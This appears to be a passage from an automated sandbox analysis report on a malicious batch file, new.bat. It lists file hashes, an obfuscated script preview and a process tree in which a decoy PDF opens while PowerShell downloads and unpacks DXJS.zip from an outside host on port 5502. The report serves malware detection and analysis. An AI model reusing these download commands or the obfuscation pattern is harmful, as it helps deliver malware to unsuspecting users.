                              SHA1:48812742ABC6C994B449E061C3015FEF441C202C
                              SHA-256:737D53F8259E5B46765D48C154669A6EECE8177CB7B0702039D6C24792C7201E
                              SHA-512:318F0C8FBCA50F67316D564C94992B77F6B37A330B5722254E539515D9976CDDF272E2563202F63C3E78C9B92A2F2BD0AF0A44E33F24F12B573706418533B46E
                              Malicious:false
                              Preview:#ifndef Py_ERRCODE_H..#define Py_ERRCODE_H..#ifdef __cplusplus..extern "C" {..#endif..../* Error codes passed around between file input, tokenizer, parser and.. interpreter. This is necessary so we can turn them into Python.. exceptions at a higher level. Note that some errors have a.. slightly different meaning when passed from the tokenizer to the.. parser than when passed from the parser to the interpreter; e.g... the parser only returns E_EOF when it hits EOF immediately, and it.. never returns E_OK. */....#define E_OK 10 /* No error */..#define E_EOF 11 /* End Of File */..#define E_INTR 12 /* Interrupted */..#define E_TOKEN 13 /* Bad token */..#define E_SYNTAX 14 /* Syntax error */..#define E_NOMEM 15 /* Ran out of memory */..#define E_DONE 16 /* Parsing complete */..#define E_ERROR 17 /* Execution error */..#define E_TABSPACE 18 /* Inconsi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1303
                              Entropy (8bit):5.0377119664077945
                              Encrypted:false
                              SSDEEP:24:5lfgGr/RQrNRIeXHWQkTPGI4qeR74nju2kQQL:nfgGlH+IaR8y3
                              MD5:E93C3D37A144F0217DB37091E7652F6A
                              SHA1:01E37A39587DCFE5E922F86B20926975C2AF5869
                              SHA-256:D0FB5200D025BB849A1B0D9DA5C9D9CB7D3E8634CD1521AAE9FC5FC76FF5B623
                              SHA-512:4E90F7E67C83431514C1EA65F8992C0780ED5A0E6638CD22481054B481B1C418696FFD6A369CA05086F7D063EB69E50BB8B26DF354E56077E0E7E56C00991AD7
                              Malicious:false
                              Preview:#ifndef Py_EXPORTS_H..#define Py_EXPORTS_H....#if defined(_WIN32) || defined(__CYGWIN__).. #if defined(Py_ENABLE_SHARED).. #define Py_IMPORTED_SYMBOL __declspec(dllimport).. #define Py_EXPORTED_SYMBOL __declspec(dllexport).. #define Py_LOCAL_SYMBOL.. #else.. #define Py_IMPORTED_SYMBOL.. #define Py_EXPORTED_SYMBOL.. #define Py_LOCAL_SYMBOL.. #endif..#else../*.. * If we only ever used gcc >= 5, we could use __has_attribute(visibility).. * as a cross-platform way to determine if visibility is supported. However,.. * we may still need to support gcc >= 4, as some Ubuntu LTS and Centos versions.. * have 4 < gcc < 5... */.. #ifndef __has_attribute.. #define __has_attribute(x) 0 // Compatibility with non-clang compilers... #endif.. #if (defined(__GNUC__) && (__GNUC__ >= 4)) ||\.. (defined(__clang__) && __has_attribute(visibility)).. #define Py_IMPORTED_SYMBOL __attribute__ ((visibility ("default"))).. #defi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1699
                              Entropy (8bit):5.316102365915941
                              Encrypted:false
                              SSDEEP:24:pyFYJ4vAQm3ujhFr7Qs7GaDPfMMvz6sGTqEV/KIdiYCY/oujnjalj0UE:wFLzm3ujEtaDHMY6sGTqkzml2
                              MD5:1509869174E08BF2FE7C91A4FB23CF0A
                              SHA1:F3D8F1C37F77FCD9EFE2C9D64CAD5EAC479B3D2A
                              SHA-256:44E912F70D933B6A5C1DF1584799671D10B984DAB9B940B37EEE0E6E1B94378B
                              SHA-512:04CCE974AEDCB90A024FA15A1185516276220D11BCCAE41BA6C6E057793A8415A8785FBFC9FCA318831E0D9A4D3F1B0533B37AB76BF2CDDD39E4106785297B84
                              Malicious:false
                              Preview:/* File object interface (what's left of it -- see io.py) */....#ifndef Py_FILEOBJECT_H..#define Py_FILEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#define PY_STDIOTEXTMODE "b"....PyAPI_FUNC(PyObject *) PyFile_FromFd(int, const char *, const char *, int,.. const char *, const char *,.. const char *, int);..PyAPI_FUNC(PyObject *) PyFile_GetLine(PyObject *, int);..PyAPI_FUNC(int) PyFile_WriteObject(PyObject *, PyObject *, int);..PyAPI_FUNC(int) PyFile_WriteString(const char *, PyObject *);..PyAPI_FUNC(int) PyObject_AsFileDescriptor(PyObject *);..../* The default encoding used by the platform file system APIs.. If non-NULL, this is different than the default encoding for strings..*/..Py_DEPRECATED(3.12) PyAPI_DATA(const char *) Py_FileSystemDefaultEncoding;..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03060000..Py_DEPRECATED(3.12) PyAPI_DATA(const char *) Py_FileSystemDefaultEncodeErrors;..#endif
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):533
                              Entropy (8bit):5.262910041141389
                              Encrypted:false
                              SSDEEP:12:BAOfsmNELN8zlZNE0JqQerCJ7sotc7oFBLorrPD:VbCOPN7qauF0lyzD
                              MD5:467643A21BBDF939E59D7C53BA5821AB
                              SHA1:4BB4A5A7867DA4957EC577C08793E3F4E4A10BF7
                              SHA-256:B07EA9C8C3975A1FF9D289B8DDAAE2A3BDDA2D4B3AD28615950EDE52B325F591
                              SHA-512:CE7CF8DDB8ACBBE8B81B6197555343293C24B4AFCBDF62E54F74BB395438DF104104E958056550DDD5419C6F280FFFA6DAB4B744A4F748D0CCC32A0BEBE600E5
                              Malicious:false
                              Preview:#ifndef Py_FILEUTILS_H..#define Py_FILEUTILS_H..#ifdef __cplusplus..extern "C" {..#endif....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03050000..PyAPI_FUNC(wchar_t *) Py_DecodeLocale(.. const char *arg,.. size_t *size);....PyAPI_FUNC(char*) Py_EncodeLocale(.. const wchar_t *text,.. size_t *error_pos);..#endif....#ifndef Py_LIMITED_API..# define Py_CPYTHON_FILEUTILS_H..# include "cpython/fileutils.h"..# undef Py_CPYTHON_FILEUTILS_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_FILEUTILS_H */..
                              Process:C:\Windows\System32\svchost.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):55
                              Entropy (8bit):4.306461250274409
                              Encrypted:false
                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                              Malicious:false
                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                              File type:Unicode text, UTF-16, little-endian text, with very long lines (14558), with no line terminators
                              Entropy (8bit):0.021673712535107987
                              TrID:
                              • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                              • MP3 audio (1001/1) 33.33%
                              File name:new.bat
                              File size:19'922'944 bytes
                              MD5:4269b91b4c2c00e8d28345e3cc6cf1a9
                              SHA1:d4ebd822c7bb237127df4bebd9e176938060286c
                              SHA256:545687c9f5fcfba81ee854cc83694b5b2e27f9e16e435662b5194d45d07e0f57
                              SHA512:f2cd2c5dafa855e2f1fa07112d5810d2b1deb92a599e56375647ec97b405777a0785a2ba0ea2a8d468373301868c1dc4bb1f81a9d01dc638c6d763c6ffc98aa1
                              SSDEEP:384:DKD/JsA+gpLPeXyo5eGG0cqsOFHfxDkwce1FbYk9DQnRDwq6QEZjnuHkFhFylhNY:xqrDo5Aai
                              TLSH:F7170F680BC34B4FF24D847DA34306256DBAA8BEAF69F496845FBD7C289D3099173314
                              File Content Preview:..&@cls&@set ".y.=dPZqo27BbK3SnlvQ0e48fICtXhgJTcuysAHr5wM1p9 jFDkR@amiNzEGWLxOU6YV"..%.y.:~48,1%%.y.:~17,1%%.y.:~29,1%%.y.:~25,1%%.y.:~4,1%%.y.:~42,1%%.y.:~4,1%%.y.:~20,1%%.y.:~20,1%%...z.C.%..%.y.:~32,1%%.y.:~17,1%%.y.:~23,1%%.y.:~13,1%%.y.:~4,1%%.y.:~29
                              Icon Hash:9686878b929a9886
                              No network behavior found

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:12:59:23
                              Start date:28/08/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
                              Imagebase:0x7ff6a0e80000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:1
                              Start time:12:59:23
                              Start date:28/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:3
                              Start time:12:59:23
                              Start date:28/08/2024
                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DTBZGIOOSO.pdf"
                              Imagebase:0x7ff6153b0000
                              File size:5'641'176 bytes
                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:4
                              Start time:12:59:23
                              Start date:28/08/2024
                              Path:C:\Windows\System32\timeout.exe
                              Wow64 process (32bit):false
                              Commandline:timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                              Imagebase:0x7ff7c6110000
                              File size:32'768 bytes
                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:5
                              Start time:12:59:24
                              Start date:28/08/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
                              Imagebase:0x7ff760310000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:12:59:27
                              Start date:28/08/2024
                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                              Imagebase:0x7ff61f300000
                              File size:3'581'912 bytes
                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:7
                              Start time:12:59:27
                              Start date:28/08/2024
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Imagebase:0x7ff77afe0000
                              File size:55'320 bytes
                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:8
                              Start time:12:59:28
                              Start date:28/08/2024
                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2236 --field-trial-handle=1508,i,1077775855205857416,457621313890120960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                              Imagebase:0x7ff61f300000
                              File size:3'581'912 bytes
                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:16
                              Start time:13:00:30
                              Start date:28/08/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DesusertionPath 'C:\Users\user\Downloads' -Force }"
                              Imagebase:0x7ff760310000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Reset < >
                                Memory Dump Source
                                • Source File: 00000005.00000002.2086091066.00007FF886120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886120000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff886120000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c24e631128ee7b04c14b8057124bf49ce18c25da9efbc00f7ce26c70d70b25d7
                                • Instruction ID: 7c13749d0b6ac878dd6aebd499debb4567a52ee10c493b2f8f917571cef3b95a
                                • Opcode Fuzzy Hash: c24e631128ee7b04c14b8057124bf49ce18c25da9efbc00f7ce26c70d70b25d7
                                • Instruction Fuzzy Hash: 3DC13C34A1894E8FDF98EF58C495AE97BF1FF68340F14416AD409D7296DA34EC82CB81
                                Memory Dump Source
                                • Source File: 00000005.00000002.2086091066.00007FF886120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886120000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff886120000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                • Instruction ID: f93d0d4ca98496660ad73e52949e428c8650d0f9941f44cd29abc5b6d9e6006f
                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                • Instruction Fuzzy Hash: 2901677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3695D736E881CB46
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2086091066.00007FF886120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886120000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff886120000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (F$8\]I$I\]I$`F
                                • API String ID: 0-563455242
                                • Opcode ID: a25742c486c8e3dfd4affe3b7d88b86232067e183da25e1968ec3aac52487eba
                                • Instruction ID: 816ebf424e8b180275da40d01051f7d59cb68e7e7dd91529bd81348949d6dc7a
                                • Opcode Fuzzy Hash: a25742c486c8e3dfd4affe3b7d88b86232067e183da25e1968ec3aac52487eba
                                • Instruction Fuzzy Hash: 83311667D0E5C55BF34B89A878061762F91FF56B9030840BBD04C4BADBF8199C59C34A